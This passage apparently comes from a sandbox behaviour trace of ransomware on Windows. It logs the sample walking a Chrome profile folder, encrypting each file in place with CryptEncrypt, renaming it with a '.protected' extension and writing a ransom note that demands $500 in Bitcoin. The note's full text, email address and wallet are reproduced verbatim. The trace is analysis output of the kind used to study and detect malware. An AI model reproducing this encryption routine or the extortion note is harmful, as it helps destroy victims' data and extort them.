lpString2="$Recycle.bin") returned 1 [0078.478] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.478] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\..") returned 98 [0078.478] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.479] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.479] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.479] lstrcmpiW (lpString1="000003.log", lpString2="Windows") returned -1 [0078.479] lstrcmpiW (lpString1="000003.log", lpString2="Program Files") returned -1 [0078.479] lstrcmpiW (lpString1="000003.log", lpString2="Program Files (x86)") returned -1 [0078.479] lstrcmpiW (lpString1="000003.log", lpString2="$Recycle.bin") returned 1 [0078.479] lstrcmpiW (lpString1="000003.log", lpString2="System Volume Information") returned -1 [0078.479] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log") returned 106 [0078.479] StrStrIW (lpFirst="000003.log", lpSrch=".protected") returned 0x0 [0078.479] lstrcmpW (lpString1="000003.log", lpString2="RESTORE_FILES.txt") returned -1 [0078.479] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.479] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log") returned 106 [0078.480] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0078.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log") returned 106 [0078.480] StrStrW (lpFirst="000003.log", lpSrch=".rar") returned 0x0 [0078.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log") returned 106 [0078.480] StrStrW (lpFirst="000003.log", lpSrch=".zip") returned 0x0 [0078.480] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x156, lpOverlapped=0x0) returned 1 [0078.481] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffeaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.481] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x156, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x156, lpOverlapped=0x0) returned 1 [0078.481] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.481] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.481] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.481] CloseHandle (hObject=0x158) returned 1 [0078.481] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.protected") returned 116 [0078.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log.protected")) returned 1 [0078.482] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.482] lstrcmpiW (lpString1="CURRENT", lpString2="Windows") returned -1 [0078.482] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files") returned -1 [0078.482] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files (x86)") returned -1 [0078.482] lstrcmpiW (lpString1="CURRENT", lpString2="$Recycle.bin") returned 1 [0078.482] lstrcmpiW (lpString1="CURRENT", lpString2="System Volume Information") returned -1 [0078.482] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT") returned 103 [0078.482] StrStrIW (lpFirst="CURRENT", lpSrch=".protected") returned 0x0 [0078.482] lstrcmpW (lpString1="CURRENT", lpString2="RESTORE_FILES.txt") returned -1 [0078.482] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.482] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.482] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT") returned 103 [0078.482] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0078.482] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT") returned 103 [0078.482] StrStrW (lpFirst="CURRENT", lpSrch=".rar") returned 0x0 [0078.482] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT") returned 103 [0078.482] StrStrW (lpFirst="CURRENT", lpSrch=".zip") returned 0x0 [0078.482] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0078.483] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.483] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0078.483] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.483] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.483] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.484] CloseHandle (hObject=0x158) returned 1 [0078.484] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT.protected") returned 113 [0078.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current.protected")) returned 1 [0078.484] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.484] lstrcmpiW (lpString1="LOCK", lpString2="Windows") returned -1 [0078.484] lstrcmpiW (lpString1="LOCK", lpString2="Program Files") returned -1 [0078.484] lstrcmpiW (lpString1="LOCK", lpString2="Program Files (x86)") returned -1 [0078.484] lstrcmpiW (lpString1="LOCK", lpString2="$Recycle.bin") returned 1 [0078.484] lstrcmpiW (lpString1="LOCK", lpString2="System Volume Information") returned -1 [0078.484] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK") returned 100 [0078.484] StrStrIW (lpFirst="LOCK", lpSrch=".protected") returned 0x0 [0078.484] lstrcmpW (lpString1="LOCK", lpString2="RESTORE_FILES.txt") returned -1 [0078.484] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.484] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.486] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK") returned 100 [0078.486] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0078.486] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK") returned 100 [0078.486] StrStrW (lpFirst="LOCK", lpSrch=".rar") returned 0x0 [0078.486] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK") returned 100 [0078.486] StrStrW (lpFirst="LOCK", lpSrch=".zip") returned 0x0 [0078.486] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.486] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.486] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.486] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.486] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.487] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.487] CloseHandle (hObject=0x158) returned 1 [0078.487] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK.protected") returned 110 [0078.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\lock.protected")) returned 1 [0078.487] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.487] lstrcmpiW (lpString1="LOG", lpString2="Windows") returned -1 [0078.488] lstrcmpiW (lpString1="LOG", lpString2="Program Files") returned -1 [0078.488] lstrcmpiW (lpString1="LOG", lpString2="Program Files (x86)") returned -1 [0078.488] lstrcmpiW (lpString1="LOG", lpString2="$Recycle.bin") returned 1 [0078.488] lstrcmpiW (lpString1="LOG", lpString2="System Volume Information") returned -1 [0078.488] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG") returned 99 [0078.488] StrStrIW (lpFirst="LOG", lpSrch=".protected") returned 0x0 [0078.488] lstrcmpW (lpString1="LOG", lpString2="RESTORE_FILES.txt") returned -1 [0078.488] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.488] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.489] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG") returned 99 [0078.489] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0078.489] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG") returned 99 [0078.489] StrStrW (lpFirst="LOG", lpSrch=".rar") returned 0x0 [0078.489] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG") returned 99 [0078.489] StrStrW (lpFirst="LOG", lpSrch=".zip") returned 0x0 [0078.489] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x9a, lpOverlapped=0x0) returned 1 [0078.490] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.490] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x9a, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x9a, lpOverlapped=0x0) returned 1 [0078.490] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.490] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.490] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.490] CloseHandle (hObject=0x158) returned 1 [0078.490] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.protected") returned 109 [0078.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log.protected")) returned 1 [0078.491] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.491] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Windows") returned -1 [0078.491] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files") returned -1 [0078.491] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files (x86)") returned -1 [0078.491] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="$Recycle.bin") returned 1 [0078.491] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="System Volume Information") returned -1 [0078.491] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001") returned 111 [0078.491] StrStrIW (lpFirst="MANIFEST-000001", lpSrch=".protected") returned 0x0 [0078.491] lstrcmpW (lpString1="MANIFEST-000001", lpString2="RESTORE_FILES.txt") returned -1 [0078.491] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.491] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.491] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001") returned 111 [0078.491] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0078.491] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001") returned 111 [0078.491] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".rar") returned 0x0 [0078.491] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001") returned 111 [0078.491] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".zip") returned 0x0 [0078.492] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x29, lpOverlapped=0x0) returned 1 [0078.493] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.493] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x29, lpOverlapped=0x0) returned 1 [0078.493] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.493] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.493] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.493] CloseHandle (hObject=0x158) returned 1 [0078.493] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001.protected") returned 121 [0078.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001.protected")) returned 1 [0078.494] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.494] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.494] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\RESTORE_FILES.txt") returned 113 [0078.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.494] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.494] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.495] lstrlenA 